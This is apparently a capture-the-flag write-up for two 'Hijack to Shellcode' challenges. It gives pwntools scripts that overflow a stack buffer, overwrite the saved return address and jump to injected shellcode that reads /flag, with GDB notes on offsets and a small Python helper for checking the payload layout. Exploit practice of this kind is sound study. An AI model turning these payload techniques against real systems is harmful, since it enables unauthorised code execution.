# Hijack to Shellcode

## Hijack to Shellcode (easy)

- ASLR is disabled
- The buffer address and the saved frame pointer (rbp) address are printed in the program's output, so the offset from the buffer to the return address can be computed from them
```python
from pwn import *

p = process('/challenge/binary-exploitation-hijack-to-shellcode-w')
context.arch = 'amd64'
shellcode = asm(shellcraft.amd64.cat('/flag'))  # reads /flag and writes it to stdout

offset = 0x38                 # bytes from the buffer start to the saved return address
buff_start = 0x7fffffffd670   # buffer address printed by the binary (ASLR is off)

payload = b'\x90'*offset                # NOP sled up to the return-address slot
payload += p64(buff_start+offset+0x8)   # new return address: the bytes right after this slot ...
payload += shellcode                    # ... which are the shellcode
p.sendline(payload)
p.interactive()
```
## Hijack to Shellcode (hard)

- ASLR disabled
- GDB: set a breakpoint after the `read` call, run, and read rbp from the registers
```python
from pwn import *

context.arch = 'amd64'
p = process('/challenge/binary-exploitation-hijack-to-shellcode')
shellcode = asm(shellcraft.amd64.cat('/flag'))
# print(asm(shellcraft.amd64.cat('/flag')))

offset = 0x58             # bytes from the buffer start to the saved return address
rbp = 0x7fffffffd6a0      # saved frame pointer taken from GDB (see note below)

payload = b'\x90'*offset  # NOP sled; also overwrites the saved rbp
payload += p64(rbp+16)    # return address slot is at rbp+8, so rbp+16 is right after it
payload += shellcode      # lands at rbp+16

# keep a copy of the payload on disk so it can be replayed under GDB
with open("sc", "wb") as f:
    f.write(payload)

p.sendline(payload)
p.interactive()
```
rbp = 0x7fffffffd690 from GDB, and the shellcode does get executed when checked in GDB with `r < <(cat sc)`. But in pwntools, rbp = 0x7fffffffd6a0 works. This 16-byte difference was also observed in the easy version, where running in a terminal printed the buffer start as 0x7fffffffd660 while the pwntools terminal printed 0x7fffffffd670.
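The address arithmetic behind both payloads, made explicit as an added example (not part of the original notes), using only `struct` instead of pwntools. The shellcode bytes are a constructed stand-in, and `build_payload`, `layout_from_rbp`, `frame_map` and `check_payload` are names chosen here:

```python
import struct

NOP = b"\x90"
PTR = 8  # size of a saved rbp or a return address on amd64

def build_payload(buf_start, ret_offset, shellcode):
    """Build the hijack payload for a frame whose buffer starts at buf_start.
    ret_offset is the distance from buf_start to the saved return address.
    Layout written to the stack, lowest address first:
        [buf_start, buf_start+ret_offset)   NOP sled (covers the saved rbp too)
        [buf_start+ret_offset, +PTR)        new return address = target
        [target, ...)                       shellcode, right after the slot
    Returns (payload, target).
    """
    target = buf_start + ret_offset + PTR
    return NOP * ret_offset + struct.pack("<Q", target) + shellcode, target

def layout_from_rbp(rbp, ret_offset):
    """Hard variant: only rbp is known (breakpoint after read()).
    The return address sits at rbp+8, so the buffer starts ret_offset bytes
    below that slot and the shellcode lands at rbp+16."""
    ret_slot = rbp + PTR
    return {"buf_start": ret_slot - ret_offset, "ret_slot": ret_slot,
            "target": rbp + 2 * PTR}

def frame_map(payload, buf_start, ret_offset):
    """Map each region of the payload to the stack addresses it overwrites."""
    ret_slot = buf_start + ret_offset
    return {
        "nop_sled": (buf_start, ret_slot),
        "saved_rbp_slot": (ret_slot - PTR, ret_slot),
        "ret_slot": (ret_slot, ret_slot + PTR),
        "shellcode": (ret_slot + PTR, buf_start + len(payload)),
        "ret_target": struct.unpack_from("<Q", payload, ret_offset)[0],
    }

def check_payload(payload, buf_start, ret_offset):
    """Return a list of layout problems; empty means self-consistent.
    Absolute stack addresses shift with the environment and argv the process
    was started with (the 16-byte GDB vs pwntools drift noted above), so take
    buf_start/rbp from the current run; the offset itself does not change."""
    m = frame_map(payload, buf_start, ret_offset)
    problems = []
    sc_lo, sc_hi = m["shellcode"]
    if sc_hi <= sc_lo:
        problems.append("no shellcode bytes follow the return-address slot")
    if not sc_lo <= m["ret_target"] < sc_hi:
        problems.append("return address 0x%x does not land in the shellcode" % m["ret_target"])
    return problems
```

With the page's values, both variants resolve to the same shellcode address, 0x7fffffffd6b0, which is the consistency check worth running before sending anything.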